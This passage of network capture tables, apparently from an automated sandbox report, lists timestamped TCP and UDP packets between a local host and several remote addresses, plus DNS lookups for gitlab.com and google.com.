                                                                                                                                                                                                                Jan 14, 2025 12:48:29.841631889 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.841671944 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.841676950 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.841706991 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.841725111 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.842101097 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.842119932 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.842154026 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.842159033 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.842181921 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.842200041 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.842514992 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.842531919 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.842569113 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.842573881 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.842597961 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.842616081 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.842901945 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.842920065 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.842953920 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.842957973 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.842983007 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.842998981 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.843758106 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.843820095 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.843832016 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.843849897 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.843871117 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.843893051 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.843997002 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.844036102 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.844052076 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.844057083 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.844089985 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.844108105 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.844139099 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.844178915 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.844199896 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.844203949 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.844225883 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.844252110 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.927556038 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.927599907 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.927691936 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.927706957 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.927746058 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.928783894 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.928854942 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.928860903 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.928885937 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.928916931 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.928934097 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929052114 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929121017 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929173946 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929215908 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929239035 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929244041 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929266930 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929289103 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929379940 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929418087 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929450989 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929455996 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929482937 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929501057 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929730892 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929770947 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929802895 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929806948 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929836035 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929857016 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.929980993 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.930018902 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.930047989 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.930052996 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.930078983 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.930097103 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.930242062 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.930279970 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.930306911 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.930310965 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.930336952 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.930351019 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.969821930 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.969871044 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.969902992 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.969911098 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:29.969954967 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.014592886 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.014640093 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.014678955 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.014688015 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.014725924 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.015796900 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.015836954 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.015906096 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.015906096 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.015912056 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.015954018 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016217947 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016254902 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016279936 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016284943 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016311884 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016330004 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016449928 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016488075 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016520977 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016525984 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016554117 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016572952 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016712904 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016750097 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016772032 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016777039 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016808987 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016828060 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.016973972 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.017011881 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.017036915 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.017040968 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.017067909 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.017086029 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.017266035 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.017304897 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.017327070 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.017332077 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.017359018 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.017370939 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.057441950 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.057496071 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.057535887 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.057542086 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.057576895 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.057590008 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.102355957 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.102410078 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.102452040 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.102478981 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.102497101 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.102520943 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.103704929 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.103745937 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.103776932 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.103781939 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.103816032 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.103835106 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.104091883 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.104130983 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.104159117 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.104163885 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.104193926 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.104212999 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.104563951 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.104608059 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.104629993 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.104635000 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.104660988 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.104686022 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.105061054 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.105104923 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.105130911 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.105135918 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.105159998 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.105171919 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.105494022 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.105531931 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.105559111 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.105564117 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.105588913 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.105604887 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.105807066 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.105843067 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.105873108 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.105878115 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.105906963 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.105921030 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.106148958 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.106219053 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.106224060 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.106264114 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.106312037 CET44349864172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.106378078 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.106437922 CET49864443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.693780899 CET49884443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.693818092 CET44349884104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.693912029 CET49884443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.694300890 CET49884443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.694314957 CET44349884104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.162067890 CET44349884104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.162138939 CET49884443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.163980007 CET49884443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.163997889 CET44349884104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.164259911 CET44349884104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.165440083 CET49884443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.207339048 CET44349884104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.295406103 CET44349884104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.295464993 CET44349884104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.295702934 CET49884443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.296061993 CET49884443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.296080112 CET44349884104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.297209024 CET49886443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.297230959 CET44349886104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.297333002 CET49886443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.297557116 CET49886443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.297565937 CET44349886104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.761049986 CET44349886104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.762722015 CET49886443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.762749910 CET44349886104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.763266087 CET49886443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.763271093 CET44349886104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.906090021 CET44349886104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.906264067 CET44349886104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.906352043 CET49886443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.906788111 CET49886443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.906810045 CET44349886104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.916012049 CET4989280192.168.2.6208.95.112.1
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.920875072 CET8049892208.95.112.1192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.920959949 CET4989280192.168.2.6208.95.112.1
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.921536922 CET4989280192.168.2.6208.95.112.1
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.926352978 CET8049892208.95.112.1192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.380508900 CET8049892208.95.112.1192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.381098032 CET4989280192.168.2.6208.95.112.1
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.386197090 CET8049892208.95.112.1192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.386347055 CET4989280192.168.2.6208.95.112.1
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.405227900 CET49898443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.405266047 CET44349898104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.405368090 CET49898443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.406117916 CET49898443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.406136036 CET44349898104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.861283064 CET44349898104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.861757994 CET49898443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.861779928 CET44349898104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.862232924 CET49898443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.862240076 CET44349898104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.991655111 CET44349898104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.991699934 CET44349898104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.991812944 CET49898443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.992202044 CET49898443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.992216110 CET44349898104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.993103981 CET49904443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.993129969 CET44349904104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.993187904 CET49904443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.993359089 CET49904443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:32.993371010 CET44349904104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:33.464243889 CET44349904104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:33.465523958 CET49904443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:33.465523958 CET49904443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:33.465545893 CET44349904104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:33.465558052 CET44349904104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:33.613255024 CET44349904104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:33.613331079 CET44349904104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:33.613605976 CET49904443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:33.614033937 CET49904443192.168.2.6104.26.12.205
                                                                                                                                                                                                                Jan 14, 2025 12:48:33.614056110 CET44349904104.26.12.205192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:33.616451025 CET4990580192.168.2.6208.95.112.1
                                                                                                                                                                                                                Jan 14, 2025 12:48:33.621381044 CET8049905208.95.112.1192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:33.622132063 CET4990580192.168.2.6208.95.112.1
                                                                                                                                                                                                                Jan 14, 2025 12:48:33.639313936 CET4990580192.168.2.6208.95.112.1
                                                                                                                                                                                                                Jan 14, 2025 12:48:33.644227028 CET8049905208.95.112.1192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:34.101788044 CET8049905208.95.112.1192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:34.102729082 CET4990580192.168.2.6208.95.112.1
                                                                                                                                                                                                                Jan 14, 2025 12:48:34.107794046 CET8049905208.95.112.1192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:34.108131886 CET4990580192.168.2.6208.95.112.1

                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                Jan 14, 2025 12:48:02.381437063 CET5030153192.168.2.61.1.1.1
                                                                                                                                                                                                                Jan 14, 2025 12:48:02.388122082 CET53503011.1.1.1192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:02.399357080 CET4955753192.168.2.61.1.1.1
                                                                                                                                                                                                                Jan 14, 2025 12:48:02.406476021 CET53495571.1.1.1192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.331305027 CET5150053192.168.2.61.1.1.1
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.338455915 CET53515001.1.1.1192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.686321974 CET5417153192.168.2.61.1.1.1
                                                                                                                                                                                                                Jan 14, 2025 12:48:30.693099976 CET53541711.1.1.1192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.907803059 CET5359753192.168.2.61.1.1.1
                                                                                                                                                                                                                Jan 14, 2025 12:48:31.915360928 CET53535971.1.1.1192.168.2.6

                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                Jan 14, 2025 12:48:02.381437063 CET192.168.2.61.1.1.10xe1eaStandard query (0)gitlab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Jan 14, 2025 12:48:02.399357080 CET192.168.2.61.1.1.10xdf36Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.331305027 CET192.168.2.61.1.1.10x88fbStandard query (0)www.google.comA (IP address)IN (0x0001)false
